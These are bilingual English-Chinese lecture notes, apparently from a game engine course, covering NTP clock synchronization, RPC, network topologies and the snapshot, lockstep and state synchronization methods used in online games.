    • If a device’s stratum value is over 15, its time is not trustworthy

      如果设备的层值超过 15,则其时间不可信

    • Device will choose server with less stratum value automatically when correcting time

      设备在校正时间时会自动选择层值较小的服务器

    webp

    NTP Algorithm

    NTP 算法

    Use NTP is quite simple, just like this

    使用 NTP 非常简单,就像这样

    • Client ask time server for time

      客户端向时间服务器请求时间

    • Server receives the request and reply

      服务器接收请求和回复

    • Client receives the reply

      客户端收到回复

    But we have to do something with the Delay!

    但我们必须对延迟做点什么!

    webp

    We recordes 4 timestamps as $t^c_0, t^s_1, t^s_2, t^c_3$

    webp

    $\mathrm{Round\ Trip\ Delay}=(tc_3-tc_0)-(ts_2-ts_1)$

    $\mathrm{Offset}=\frac{(ts_1-tc_0+ts_2-tc_3)}{2}$

    The implicit assumption that the one way delay is statistically half the roundtrip delay

    单向延迟在统计上是往返延迟的一半的隐含假设

    Local-clock correction is computed from the offset data by.

    根据偏移数据计算本地时钟校正。

    • $t^c_3 + \mathrm{Offset}$

    *The delay and clock-offset samples obtained can be filtered using maximum-likelihood technigues

    *获得的延迟和时钟偏移样本可以使用最大似然技术进行滤波

    Let’s take an example:

    让我们举一个例子:

    It’s 17:01:00 on the client

    • $t^c_0$ is 17:01:00
    • $t^s_1$ is 17:01:32
    • $t^s_2$ is 17:01:33
    • $t^c_3$ is 17:01:05

    It’s 17:01:30 on the server

    (17:01:30)

    (17:01:32)

    (17:01:33)

    (17:01:35)

    $\mathrm{Round\ Trip\ Delay}=(tc_3-tc_0)-(ts_2-ts_1)$

    $\mathrm{Offset}=\frac{(ts_1-tc_0+ts_2-tc_3)}{2}$


    Round Trip Delay = (05 - 00) - (33 - 32) = 4s

    Offset = (32 - 00 + 33 - 05) / 2 = 30s

    So at $t^c_3$ client’s time is corrected to:

    • $t^c_3 + \mathrm{Offset}= 17:01:35$

    Stream-Based Time Synchronization with Elimination of Higher Order Modes

    基于流的时间同步,消除高阶模式

    1. Client stamps current local time on a “time request” packet and sends to server

    ​客户端在“时间请求”数据包上标记当前本地时间并发送到服务器

    2. Upon receipt by server, server stamps server-time and returns

    ​服务器收到后,服务器标记服务器时间并返回

    3. Upon receipt by client, a time delta is calculated by delta = (current Time-sent Time) / 2

    ​客户端收到后,通过 delta=(当前发送时间)/2 计算时间增量

    So far this algorithm is very like to NTP

    到目前为止,该算法与 NTP 非常相似

    4. The first result should immediately be used toupdate the clock

    ​第一个结果应立即用于更新时钟

    5. The client repeats Steps 1-3 (NTP-like process), five or more times

    ​客户端重复步骤1-3(类似 NTP 的过程)五次或更多次

    6. The results of the packet receipts are accumulatedand sorted in ascending order by latency

    ​数据包接收的结果按延迟升序累积和排序

    7. All samples above that are approximately 1.5 times the median are discarded, and the remaining samples are averaged using an arithmetic mean

    ​丢弃上述约为中位数 1.5 倍的所有样本,并使用算术平均值对剩余样本进行平均

    webp

    Remote Procedure Call (RPc)

    远程过程调用(RPC)

    Socket Programming: Still not Great

    Socket 编程:仍然不太好

    • Lots for the programmer to deal with every time

      程序员每次都要处理很多事情

      • How to separate different requests on the same connection?

        如何在同一连接上分离不同的请求?

      • How to write bytes to the network/read bytes from the network?

        如何向网络写入字节/从网络读取字节?

      • What if Host A’s process is written in Go and Host B’s process is in C++?

        如果主机 A 的进程是用 Go 编写的,而主机 B 的进程是 C++ 编写的呢?

      • What to do with those bytes?

        如何处理这些字节?

    • Still pretty painful… have to worry a lot about the network

      仍然很痛苦…不得不非常担心网络

      • Have you received the message?

        你收到消息了吗?

    Communication with Messages

    消息通信

    webp

    Communication Way

    沟通方式

    Initially, people “hand-coded” messages to send requests and responses

    最初,人们“手工编码”消息以发送请求和响应

    • Message is a stream of bytes-“op codes” and operands

      消息是字节流-“操作码”和操作数

    Lots of drawbacks

    很多缺点

    • Need to worry about message format

      需要担心消息格式

    • Have to pack and unpack data from messages

      必须从消息中打包和解包数据

    • Servers have to decode messages and dispatch them to handlers

      服务器必须解码消息并将其分派给处理程序

    • Messages are often asynchronous

      消息通常是异步的

      • After sending one, what do you do until the response comes back?

        发送一个后,在收到回复之前,你会做什么?

    • Messages aren’t a natural programming mode

      消息不是一种自然的编程模式

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    struct foomsg {
    uint32 _t len;
    };

    void send_foo(char *contents) {
    int msglen = sizeof(struct foomsg) + strlen(contents);
    char buf = malloc(msglen);
    struct foomsg *fm = (struct foomsg *)buf;
    fm->len = htonl(strlen(contents));
    memcpy(buf + sizeof(struct foomsg), contents, strlen(contents));
    write(outsock,buf, msglen);
    }

    More Challenges on Logic Communication

    逻辑通信面临更多挑战

    • For a remote procedure call, a remote machine may:

      对于远程过程调用,远程机器可以:

      • Run process written in a different language

        运行用其他语言编写的进程

      • Represent data types using different sizes

        使用不同大小表示数据类型

      • Use a different byte ordering (endianness)

        使用不同的字节顺序(字节序)

      • Represent floating point numbers differently

        以不同的方式表示浮点数

      • Have different data alignment requirements

        有不同的数据对齐要求

        e.g., 4-byte type begins only on 4-byte memory boundary

        例如,4 字节类型仅在 4 字节内存边界上开始

    Remote Procedure Call (RPC)

    远程过程调用(RPC)

    • RPC is a reguest-response protocol. An RPC is initiated by the cient, which sends a reguest message to a known remote server to execute a specified procedure with supplied parameters

      RPC 是一种规范的响应协议。RPC 由 cient 发起,它向已知的远程服务器发送一条规则消息,以使用提供的参数执行指定的过程

    • Goals

      目标

      • Ease of programming

        易于编程

      • Hide complexity

        隐藏复杂性

      • Familiar model for programmers (just make a function call)

        程序员熟悉的模型(只需进行函数调用)

    webp

    RPC example

    • Go language

    webp

    • Output

      Hello World

    Why RPC?

    为什么选择 RPC?

    • Goal: Easy-to-program network communication that makes client-server communication transparent

      目标:易于编程的网络通信,使客户端-服务器通信透明

      • Retains the “feel” of writing centralized code

        保留编写集中式代码的“感觉”

      • Programmers needn’t think about the network

        程序员不必考虑网络

      • Make communication appear like a local procedure call

        使通信看起来像本地过程调用

    • Don’t need to worry about serialization/deserialization for network

      无需担心网络的序列化/反序列化

    • Don’t need to worry about complexities of network

      无需担心网络的复杂性

    Interface Definition Language

    接口定义语言

    • A server defines the service interface using an interface definition language (lDL)

      服务器使用接口定义语言(lDL)定义服务接口

      The lDL specifies the names, parameters, and types for allclient-callable server procedures

      lDL 指定了所有客户端可调用服务器过程的名称、参数和类型

      • example: ASN.1 in the OSI reference model

        示例:OSI 参考模型中的 ASN.1

      • example: Protobuf (Google’s data interchange format)

        示例:Protobuf(谷歌的数据交换格式)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    //polyline.proto
    syntax ="proto2";

    message Point {
    required int32 x = 1;
    required int32 y = 2;
    optional string label = 3;
    }

    message Line {
    required Point start = 1;
    required Point end = 2;
    optional string label = 3;
    }

    message Polyline {
    repeated Point point = 1;
    optional string label = 2;
    }

    RPC Stubs

    • A client-side stub is a procedure that looks to the client as if it were a callable server procedure

      客户端存根是一个过程,它在客户端看起来就像是一个可调用的服务器过程

      • The client program thinks it’s invoking the server butit’s calling into the client-side stub

        客户端程序认为它正在调用服务器,但它正在调用客户端存根

    • Aserver-side stub looks like a caller to the server

      服务器端存根看起来像是服务器的调用者

      • The server program thinks it’s called by the client but it’s really called by the server-side stub

        服务器程序认为它是由客户端调用的,但实际上是由服务器端存根调用的

    • The stubs send messages to each other to make the RPC happen transparently

      存根相互发送消息,使 RPC 透明地发生

    webp

    Stub compiler

    • A “stub compiler” reads the IDL declarations and produces two stub procedures for each server procedure

      “存根编译器”读取 IDL 声明,并为每个服务器过程生成两个存根过程

      • The server programmer implements the service’s procedures and links them with the server-side stubs

        服务器程序员实现服务的过程,并将其与服务器端存根链接起来

      • The client programmer implements the client program and links it with the client-side stubs

        客户端程序员实现客户端程序并将其与客户端存根链接

      • The stubs manage all of the details of remote communication between client and server

        存根管理客户端和服务器之间远程通信的所有细节

    Real RPC Package vourney

    真实 RPC 包凭证

    webp

    Network Topology

    网络拓扑

    Original Peer-to-Peer (P2P)

    原始点对点(P2P)

    • Each client broadcasts game event to the al others

      每个客户端向其他客户端广播游戏事件

    • Robustness

      稳健性

    • Cheating is much easier

      作弊要容易得多

    • Synchronization is required among all nodesto maintain the consistency of the distributed game state

      所有节点之间需要同步,以保持分布式游戏状态的一致性

    webp

    P2P with Host Server

    P2P 与主机服务器(如 CS)

    • A player can act as “server”, known as host

      玩家可以充当“服务器”,即主机

    • If host disconnected, the game may end

      如果主机断开连接,游戏可能会结束

    • The host need to handle game actor that cannot be controled by players, such as bot

      主机需要处理玩家无法控制的游戏角色,如机器人

    webp

    P2P Games

    P2P 游戏

    • No rely on server

      不依赖服务器

    • Used in Lan commonly

      常用于局域网

    • The “Host”is basically in control of the sessions

      “主持人”基本上控制着会话

    • A limited number of players at once

      一次玩家数量有限

    webp

    Dedicated Server

    专用服务器

    • Authority

      权威机构

    • Simulate game world

      模拟游戏世界

    • Dispatch data to players

      向玩家发送数据

    • High performance requirements

      高性能要求

    webp

    P2P vs Dedicated Server

    P2P 与专用服务器

    P2PDedicated Server
    Pros1. Robustness
    稳健性
    2. Removes the “server issues” problem in multiplayer sessions.
    消除多人游戏会话中的“服务器问题”问题
    3. No extra cost on server
    服务器无需额外付费
    1. Easy to maintain as well as cheating avoidance
    易于维护,避免作弊
    2. Can handle massive game world
    可以处理大型游戏世界
    3. Responsiveness of the game is not relay on the network conditions of each individual client
    游戏的响应性并不取决于每个客户端的网络状况
    Cons1. Cheating is much easier
    作弊要容易得多
    2. Every player needs a decent network connection for game to function properly
    每个玩家都需要一个像样的网络连接,游戏才能正常运行
    3. Can only handle a limited number of players
    只能处理有限数量的玩家
    1. High cost on server
    服务器成本高
    2. Much more work on server side program
    在服务器端程序上还有更多的工作要做
    3. Single point of failure
    单点故障

    When RTT is too high

    RTT 过高时

    • When players are in different countries, far away, or when the network environment is complex

      当玩家身处不同的国家、遥远的地方,或者网络环境复杂时

    • Use dedicated line and edge gateway to reduce latency

      使用专用线路和边缘网关来减少延迟

    webp

    Game Synchronization

    游戏同步

    Single-Player Gaming

    Game Tick

    • Player inputs

      玩家输入

    • Convert to game commands

      转换为游戏命令

    • Game logic

      游戏逻辑

    • Game render

      游戏渲染

    For Player

    对于玩家

    • Player inputs

      玩家输入

    • Consistency in each other

      彼此的一致性

    webp

    Online Gaming

    在线游戏

    For Player

    对于玩家

    • Player inputs

      玩家输入

    • Consistency in each other

      彼此的一致性

    How to play together at different terminals?

    如何在不同的终端上一起玩?

    • Game commands

      游戏命令

    • Game Logic

      游戏逻辑

    webp

    Game Synchronization

    游戏同步

    To answer the demand for responsive strategies, the synchronization rule is designed to solve the delay and consistency of all destination.

    为了满足对响应策略的需求,设计了同步规则来解决所有目的地的延迟和一致性问题。

    Synchronization Methods

    同步方法

    webp

    Snapshot 快照Lockstep 锁步State Synchornization 状态同步
    QuakeHonor of Kings 王者荣耀Counter Strike 反恐精英

    Snapshot Synchronization

    快照同步

    webp

    • Client sends inputs to server

      客户端向服务器发送输入

    • Server simulates the game world

      服务器模拟游戏世界

    • Generates whole game statesnapshots

      生成整个游戏状态快照

    • Sends them down to clients

      将它们发送给客户

    • Client updates the display according to the snapshot

      客户端根据快照更新显示

    Snapshot Synchronization - Jitter and Hitches

    快照同步-抖动和挂接

    • Server tick rate is limited

      服务器时间速率有限

    • Performance

      性能

    • Bandwidth

      带宽

    Snapshot Interpolation

    快照插值

    • Not rendering immediately after snapshot recevied

      收到快照后不立即渲染

    • Keep an interpolation buffer

      保留插值缓冲区

    • Interpolation between the two delayed snapshots

      两个延迟快照之间的插值

    Delta Compression

    德尔塔压缩

    • Only sync snapshot delta to client

      仅将快照增量同步到客户端

    • Example Quake3

    webp

    Snapshot Synchorization

    快照同步

    • 60HZ

    • Max Bandwidth 4.5 mbps

      最大带宽 4.5mbps

    Delta Compression

    德尔塔压缩

    • 60HZ

    • Max Bandwidth 676 kbps

      最大带宽 676 kbps

    Synchronizing Snapshot

    正在同步快照

    • Client performance is wasted

      客户端性能被浪费

    • High server pressure

      服务器压力高

    • High data volume and high bandwidth requirements

      高数据量和高带宽要求

    • As games get more complex, snapshots get bigger

      随着游戏变得越来越复杂,快照也越来越大

    Lockstep Synchronization

    锁步同步

    Lockstep Origin

    锁步原点

    Lockstep synchronization, used in military simulation, is by far the simplest techique to ensure consistency

    用于军事模拟的锁步同步是迄今为止确保一致性的最简单技术。

    • Same Result

      相同的结果

    • Same time

      同一时间

    • Same action

      同样的行动

    No member is allowed to advance its simulation clock until all others members have acknowledged that they are done.

    在所有其他成员确认完成之前,任何成员都不允许提前其模拟时钟。

    webp

    In particular, it is clear that a totally ordered delivery is a sufficient condition to ensure game state consistency across different nodes, as it guarantees that all generated events are reliably delivered according to the same unique order.

    特别是,很明显,完全有序的交付是确保不同节点之间游戏状态一致性的充分条件,因为它保证了所有生成的事件都按照相同的唯一顺序可靠地交付。

    Lockstep in Online Game

    网络游戏中的锁步

    Lockstep Principle.

    锁步原理。

    webp

    First Game Used Lockstep

    第一个游戏使用锁步

    • The network synchronization methodof DOOM (1994) was pointed out in a 2006 paper

      2006 年的一篇论文指出了 DOOM(1994)的网络同步方法

    • Lockstep is not mentioned in the paper, but it is now generally accepted that Doom (1994) was the first multiplayer FPS online game to use this type of synchronization

      论文中没有提到锁步,但现在人们普遍认为《毁灭战士》(1994)是第一款使用这种同步的多人 FPS 在线游戏

    • It uses P2P architecture

      它使用 P2P 架构

    webp

    Lockstep initialization

    锁步初始化

    Loading…

    加载…

    • Ensure that the initial data of each client is deterministic

      确保每个客户端的初始数据是确定的

      • Game model

        游戏模型

      • Static data

        静态数据

    • Synchronize clock

      同步时钟

    Deterministic Lockstep

    确定性锁步

    • Client sends inputs to Server

      客户端向服务器发送输入

    • Server receives and sorts

      服务器接收和排序

    • Wait for input from all clients before forwarding

      转发前等待所有客户端的输入

    • After receiving data from the server, the client executes the game logic

      在从服务器接收到数据后,客户端执行游戏逻辑

    webp

    If Player B’s message B2 arrives later? (The dotted line B2 in the figure)

    如果玩家 B 的消息 B2 稍后到达?(图中虚线 B2)

    • Disadvantages

      缺点

      • Game progress depends on slowest player

        游戏进度取决于最慢的玩家

      • The delay of the game is notfixed, the experience is not good

        游戏的延迟不是固定的,体验不好

      • All the players will wait if a player offline

        如果有玩家离线,所有玩家都会等待

    webp

    Player Offline in Deterministic Lockstep

    确定性锁步中的玩家离线

    Waiting for players…

    正在等待玩家…

    webp

    Bucket Synchronization

    Bucket 同步

    • Bucket: a fixed time period

      Bucket:固定时间段

    • Each bucket

      每个水桶

      • Colect all instructions

        整理所有说明

      • Broadcast to all players

        向所有玩家广播

    • There is no need to wait for all players’ commands to be received before forwarding

      转发前无需等待收到所有玩家的命令

    webp

    A Good Trade-off between Consistency and Interactivity Maintenance

    一致性和交互性维护之间的良好权衡

    So we need to find a basis balance between them.

    因此,我们需要在它们之间找到一个基本的平衡点。

    The threshold:

    阈值:

    As soon as the measured interactivity degree decreases below a given thresholdtake some procedure skips processing obsolete game events withthe aim of bringing back a satisfactory interactivity level.

    一旦测量的交互性降低到给定的阈值以下,一些程序就会跳过处理过时的游戏事件,以恢复令人满意的交互性水平。

    webp

    Deterministic Difficulties

    确定性难题

    • Deterministic

      确定性

      • The same input sequence need to produce the same game state on all machines

        相同的输入序列需要在所有机器上产生相同的游戏状态

    • Deterministic is Hard

      确定性很难

      • Floating point

        浮点型

      • Random number

        随机数

      • Containers and algorithms (sort, add, remove, etc.)

        容器和算法(排序、添加、删除等)

      • Math tools (vectors, quaternions, etc)

        数学工具(向量、四元数等)

      • Physics simulation (very difficult)

        物理模拟(非常困难)

      • Code logic execution order

        代码逻辑执行顺序

    webp

    Floating Point Numbers

    浮点数

    • Because of the computer binary, Thesenumbers can be accurately represented

      由于计算机二进制,这些数字可以被精确地表示出来

      • 0.5 = 1/2
      • 0.25 = 1/4
      • 0.75 = 1/2 + 1/4
      • 0.875 = 1/2 + 1/4 + 1/8
    • Such numbers can only be approximated

      这些数字只能近似表示

      • 2/3 ≈ 0.66…7

    webp

    • Floating point numbers must comply with the lEEE 754 standard

      浮点数必须符合 lEEE 754 标准


    • Floating point numbers conform to the lEEE 754standard

      浮点数符合 lEEE 754 标准

    • But different platforms may have different behavior

      但不同的平台可能有不同的行为


    Floating Point Hardware & OS Behaviour

    浮点硬件和操作系统行为

    • Intel / Amd

    • PS / Xbox

    • Windows / linux

    • Android / IOS


    Floating Point Compilers Behaviour

    浮点编译器行为

    • Math Library(sin、cosin、tan、exp、pow …)

      数学库(sin、cosin、tan、exp、pow…)

    • Third party components

      第三方组件

    • Different platforms

      不同的平台

    • Different versions

      不同版本

    • Different languages

      不同的语言


    Idea: Avoid problems on the precision boundary, customize the precision

    理念:避免精度边界问题,定制精度

    • Fixed-point math library

      定点数学库

    • Look-up table (trigonometric functions, etc.)

      查找表(三角函数等)

    • Amplification and truncation

      放大和截断

    Simple method

    简单的方法

    • Multiply by 1000, then divide by 1000, there is an overflow risk

      乘以 1000,然后除以 1000,存在溢出风险

    • The numerator and denominator are represented by fixed-point numbers (2/3)

      分子和分母由定点数(2/3)表示


    One Solution: Fixed point math

    一种解决方案:定点数

    A fixed-point number can be split into three parts

    一个定点数可以分成三部分

    • An optional sign bit

      可选符号位

    • An integer

      一个整数

    • A fractional part

      分数部分

    • Need to implement addition, subtraction, multiplication and division etd.

      需要实现加、减、乘、除等运算

    • Implement class, class methods

      实现类、类方法

    • Performance needs to be considered

      需要考虑性能

    webp

    $$V=(-1){b_{f+i}}(\sum_{n=0}{i}2{n}b_{n+f}+\sum_{m=1}{f}2^{-m}b_{f-m})$$

    Random Number

    随机数

    • Random problems in the game

      游戏中的随机问题

      • Trigger of random events, npc random birthplace

        随机事件触发,NPC 随机出生地

      • A random attribute of the attack, e.g. critical strike chance

        攻击的随机属性,例如暴击机会

    • These logics are generally implemented with random numbers

      这些逻辑通常用随机数实现

    • How to implement random logic that is completely consistent for multiple players

      如何为多个玩家实现完全一致的随机逻辑

    webp

    • Random numbers are pseudorandom

      随机数是伪随机的

    • Before the game starts, initialize the random number seed

      在游戏开始之前,初始化随机数种子

    • For different players’ clients, the number of random function calls is fixed, and the generated random numbers are the same

      对于不同玩家的客户端,随机函数调用的数量是固定的,生成的随机数是相同的

    webp

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    int main() {
    std::default random engine e;
    std::uniform int distribution<int> u(0,100);
    e.seed(80);

    for(int i = 0; i < 20; i++) {
    std::cout << u(e) << std::endl;
    }

    return 0;
    }

    Deterministic Solution

    确定性解

    • Fixed-point numbers represent floating-point numbers in critical game logic

      定点数表示关键游戏逻辑中的浮点数

    • Deterministic random algorithm

      确定性随机算法

    • Deterministic containers and algorithms (sort, add, remove, etc.)

      确定性容器和算法(排序、添加、删除等)

    • Deterministic math tools (vectors, quaternions, etc.)

      确定性数学工具(向量、四元数等)

    • Deterministic physics simulation (very difficult)

      确定性物理模拟(非常困难)

    • Deterministic execution order

      确定性执行顺序

    webp

    Tracing and Debugging

    跟踪和调试

    Method of get checksum

    获取校验和的方法

    • All data checksum

      所有数据校验和

    • Key data checksum

      关键数据校验和

    • Other methods

      其他方法

    Automatically locate BUG

    自动定位 BUG

    • Server compares different client’s checksums

      服务器比较不同客户端的校验和

    • Client uploads 50 frames of full logs

      客户端上传 50 帧完整日志

    • Find inconsistencies in the compared logs

      查找比较日志中的不一致之处

    webp

    Lag and Delay

    延迟和延误

    • Client send operation

      客户端发送操作

    • Receive the operation of this frame from the server

      从服务器接收此帧的操作

    • execute

      执行

    Lag: Network is unstable. lf you wait until you receivenew frame, there will be a lag

    滞后:网络不稳定。如果你等到收到新帧,就会产生延迟

    Solution

    解决方案

    • use buffer to cache frames

      使用缓冲区缓存帧

      • Large buffer, large delay

        缓冲区大,延迟大

      • Small buffer, sensitive to lag

        小缓冲区,对延迟敏感

    webp

    Separating Game Logic from Rendering

    将游戏逻辑与渲染分离

    Lag problem

    滞后问题

    • Separation of logic and rendering

      逻辑与渲染的分离

    • Local client-side interpolation smoothing

      本地客户端插值平滑

    Frame rate

    帧率

    • The logical frame rate is generally 10~30 frames

      逻辑帧率一般为 10~30 帧

    • The rendering frame rate is generally higher

      渲染帧率通常较高

    webp

    Advantage

    优势

    • Different frequencies, independent operation

      不同频率,独立运行

    • Rendering separation to avoid tearing and freezing

      渲染分离以避免撕裂和冻结

    • Rendering freezes, does not affect the operation of logical frames

      渲染冻结,不影响逻辑帧的操作

    • Servers can run logic frames to solve some cheating problems

      服务器可以运行逻辑框架来解决一些作弊问题

    • If the server runs logical frames, it can save key frame snapshots to speed up reconnection

      如果服务器运行逻辑帧,它可以保存关键帧快照以加快重新连接

    Reconnection Problem

    重新连接问题

    • Offline

      离线

    • Reconnect

      重新连接

    • Catch up

      赶上

    webp

    Client Game State Snapshots

    客户端游戏状态快照

    • Snapshots can be saved regularly on the local client and serialized to disk

      快照可以定期保存在本地客户端上并序列化到磁盘

    • When reconnection occurs, restore thegame state from the disk serialized data

      重新连接时,从磁盘序列化数据还原游戏状态

    • Server sends player commands after snapshot

      服务器在快照后发送玩家命令

    • Accelerate to catch up with the game progress

      加速以赶上游戏进度

    webp

    Quick Catch Up

    快速赶上

    How to catch up?

    如何迎头赶上

    • In the sample code, chasing 10 frames each time

      在示例代码中,每次追踪 10 帧

    • If originally 10 frames per second, when chasing frames, it may run 100 frames per second

      如果最初每秒 10 帧,在追逐帧时,它可能每秒运行 100 帧

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    float m_delta = 0;
    float m_tick_delta = 100;
    void CBattleLayer::update(float delta) {
    // do something
    m_delta += delta;
    int exec_count = 1;
    while(m_delta >= m_tick_delta) {
    m_delta -= m_tick_delta;
    // logic frame
    if(!logicUpdate(LOGIC_TIME)) {
    return;
    }
    // catch up 10 frames at a time
    if(exec_count++ >= 10){
    break;
    }
    }
    // do something
    }

    Server State Snapshot Optimization

    服务器状态快照优化

    • The server runs logical frames and saves snapshots of keyframes

      服务器运行逻辑帧并保存关键帧的快照

    • The server sends the snapshot, and the player commands after the snapshot

      服务器发送快照,玩家在快照后发出命令

    • Accelerate to catch up with the game progress

      加速以赶上游戏进度

    webp

    Temporary Offline, No Crash

    暂时离线,无崩溃

    • Client also keeps game state, keyframes, deterministic-timed frames

      客户端还保留游戏状态、关键帧、确定性定时帧

    • After reconnecting, the server sends commands to the dropped player

      重新连接后,服务器向被删除的播放器发送命令

    • Accelerate to catch up the game progress

      加速以赶上游戏进度

    webp

    Observing

    观察

    Watching other players playing the game

    观看其他玩家玩游戏

    • Reconnecting and watching are essentially the same

      重新连接和观看基本上是一样的

    • Watching is similar to reconnecting after a client crash

      监视类似于在客户端崩溃后重新连接

    • Player action command, forwarded to the player watching the game

      玩家动作命令,转发给观看游戏的玩家

    • Watching is usually delayed for a few minutes to prevent screen peeping

      观看通常会延迟几分钟,以防止偷看屏幕

    webp

    Replay

    重播

    Execute player commands in order which can speed up

    按照可以加速的顺序执行玩家命令

    • Replay file

      回放文件

      • Save game commands for a game

        保存游戏命令

      • Files take up little space

        文件占用的空间很小

    • How to implement go back?

      如何实施回退?

      • When the client executes the replay file, it adds a key frame snapshot, which can go back to the key frame moment

        当客户端执行回放文件时,它会添加一个关键帧快照,该快照可以返回到关键帧时刻

      • The current version of Honor of Kings go back to the key frame before 60s

        当前版本的《王者荣耀》回退了 60s 的关键帧

    webp

    Lockstep Cheating lssues

    锁步作弊问题

    Multiplayer-PVP

    多人 PVP

    • Game over

      游戏结束

      • The client uploads the key data checksum, the server verifys the game result

        客户端上传密钥数据校验和,服务器验证游戏结果

    • During the game

      在游戏过程中

      • Report the key data checksum

        报告密钥数据校验和

      • Cheating players are kicked out, etc.

        作弊的玩家被踢出等等。

    webp

    2 Players

    2 名玩家

    • Server can not detect who is cheating using key data checksum

      服务器无法使用密钥数据校验和检测谁在作弊

    • If the server is not verified, the cheating player will only affect one player in this case

      如果服务器未经验证,作弊玩家在这种情况下只会影响一个玩家

    webp

    • Difficult to avoid third-party plug-in to access war-fog or other hidden data

      难以避免第三方插件访问战争迷雾或其他隐藏数据

      • Game logic is performed on the client side

        游戏逻辑在客户端执行

      • Clients have all the game data

        客户端拥有所有游戏数据

    webp

    Lockstep Summary

    锁定步骤摘要

    Advantages

    优势

    • Low bandwidth, only sends commands

      带宽低,只发送命令

    • High development efficiency, similar to single-player game development

      开发效率高,类似单人游戏开发

    • Precise action/hit detection

      精确的动作/命中检测

    • Easy to record games

      易于录制游戏

    Problems

    问题

    • Maintain the consistency is difficult to achieve

      保持一致性很难实现

    • Hard to solve the cheat plugin to unveil all game states

      难以解决的作弊插件揭示所有游戏状态

    • Longer disconnection and reconnection time

      更长的断开和重新连接时间

      • Need more complex optimization

        需要更复杂的优化

    State Synchronization

    状态同步

    webp

    Replication Protocol of Halo

    Halo 的同步协议

    webp

    State DataEventsControl Data
    Guaranteed eventual delivery of most current state
    保证最终交付最新状态
    - Object position
    对象位置
    - Object health
    对象生命
    - 150+ properties
    150+ 个属性
    Unreliable notifications of transient occurrences
    不可靠的瞬态事件通知
    - Please fire my weapon
    请发射我的武器
    - This weapon was fired
    此武器已被发射
    - Projectile detonated
    弹丸被引爆
    -More events
    更多事件
    High-frequency, the best-effort transmission of rapidly-updated data extracted from player control inputs
    高频、尽最大努力传输从玩家控制输入中提取的快速更新数据
    - Current analog stick values for all players
    所有玩家的当前模拟棒值
    - Current position of client’s own biped
    客户端自己的角色的当前位置
    -More properties
    更多属性

    State

    状态

    • The game state is necessary to represent the game world. e.g: HP, MP

      游戏状态是代表游戏世界所必需的。例如:血量、法力

    State Synchronization

    状态同步

    • Server does not generate a single update for all clients. lt sends client a customized data packet

      服务器不会为所有客户端生成单个更新。它向客户端发送自定义数据包

    • lf the game world is too complex, you can set an Area Of Interest (AOl) for reducing server overhead

      如果游戏世界太复杂,您可以设置一个兴趣区域(AOl)来减少服务器开销

    Server Authorizes the Game World

    服务器授权游戏世界

    Server

    服务器

    • Game world is authorized

      游戏世界已授权

    • Receive input and state from client

      从客户端接收输入和状态

    • Run game logic

      运行游戏逻辑

    • Send state

      发送状态

    Client

    客户端

    • Receive data and simulate game world

      接收数据并模拟游戏世界

    • Game play improvement

      游戏玩法改进

    webp

    Authorized and Replicated Clients

    授权和同步客户端

    Authorized (1P)

    授权(1P)

    • Player’s local game client

      玩家的本地游戏客户端

    Server

    服务器

    • Authorized server

      授权服务器

    Replicated (3P)

    已同步(3P)

    • Simulated character in other player’s client

      其他玩家客户端中的模拟角色

    webp

    State Synchronization Example

    状态同步示例

    Player1 (Authorized)

    玩家 1(授权)

    • Fire

      开火

    Player2 (Replicated)

    Player2(已同步)

    • See player1 open fire

      看到玩家 1 开火


    Player 1 presses an input on their local machine to fire

    玩家 1 按下本地机器上的输入进行射击

    Player1 (Authorized)

    玩家 1(授权)

    • Fire

      开火

    • Send to server

      发送到服务器

    Server

    服务器

    • Player1 fire

      玩家 1 开火

    • Send to each client

      发送给每个客户端

    Player2 (Replicated)

    玩家 2(已同步)

    • Recieve packet

      接收数据包

    • Player1 fire

      Player 1 开火


    Server

    服务器

    Tell each client to replicate the movement of Player 1’s projectile.

    告诉每个客户同步玩家 1 投射物的运动。


    Server

    • Tell each client to destroy their copies of Player 1’s projectile

      告诉每个客户销毁他们的玩家 1 投射物副本

    • Tell all clients to response to damage of the projectile

      告诉所有客户对弹丸的损坏做出反应

    Dumb Client Problem

    哑巴客户端问题

    Clients can not to do anything until receive server state update

    在收到服务器状态更新之前,客户端无法执行任何操作

    How to see an immediate response?

    如何看到即时响应?

    • Client-side prediction

      客户端预测

    • Server reconciliation

      服务器对账

    webp

    Client-Side Prediction

    客户端预测

    Authorized client

    授权客户

    • Press “→”

      按“→”

    • Received server message

      收到服务器消息

    • Start movement

      开始移动

    webp

    Overwatch - Client-side Prediction

    守望先锋-客户端预测

    • RTT = 160ms

      RTT = 160 毫秒

    • Half RTT = 80ms

      半 RTT = 80 毫秒

    • Command frame = 16ms

      命令帧 = 16ms

    The client is always ahead of the server by half RTT and one buffered command frame

    客户端始终领先于服务器一半的 RTT 和一个缓冲命令帧

    • Press key and response immediately

      按键并立即响应

    webp

    Server Reconciliation

    服务器对账

    Authorized client: Buffer

    授权客户:Buffer

    • Record every state when do the client prediction

      在进行客户端预测时记录每个状态

    • Compare with the past server data when it was received on client side

      与客户端接收到的过去服务器数据进行比较


    Ring buffer for states

    状态环形缓冲区

    • Stores all of our states in the past several frames on client

      将过去几帧中的所有状态存储在客户端上

    Process

    流程

    • If the client computed the same result as server, the client will continue on its merry way to simulate the next input

      如果客户端计算出的结果与服务器相同,客户端将继续愉快地模拟下一个输入

    Problem

    问题

    • lf misprediction?

      如果预测失误?

    webp


    • If blocked by an obstacle at the server

      如果被服务器上的障碍物阻挡

    • Position is wrong! (in red)

      位置不对!(红色)

    • Client must accept the new server

      客户端必须接受新服务器

    • update

      更新

    • Retrace all predicted movement starting from the new confirmed position

      从新的确认位置开始回溯所有预测的运动

    webp


    • If the client and server disagree on the results, we’ve mispredicted

      如果客户端和服务器对结果不一致,我们就预测错了

    • Have to reconcile

      必须和解

    Ring buffer for inputs

    用于输入的环形缓冲区

    • Stores all of inputs we did in the past several frames on client.

      在客户端上存储我们在过去几帧中所做的所有输入。

    Process

    流程

    • Overwrite the clients results withthe server’s results

      用服务器的结果覆盖客户端的结果

    • Replay all of your inputs to catchback up to what you believe now

      重播您的所有输入,以回溯您现在所相信的内容

    webp

    Server Reconciliation Example

    服务器对账示例

    Overwatch

    守望先锋

    • We try to move

      我们试图移动

    • The server said no

      服务器拒绝了

    • We got yanked back down to where we were before and froze

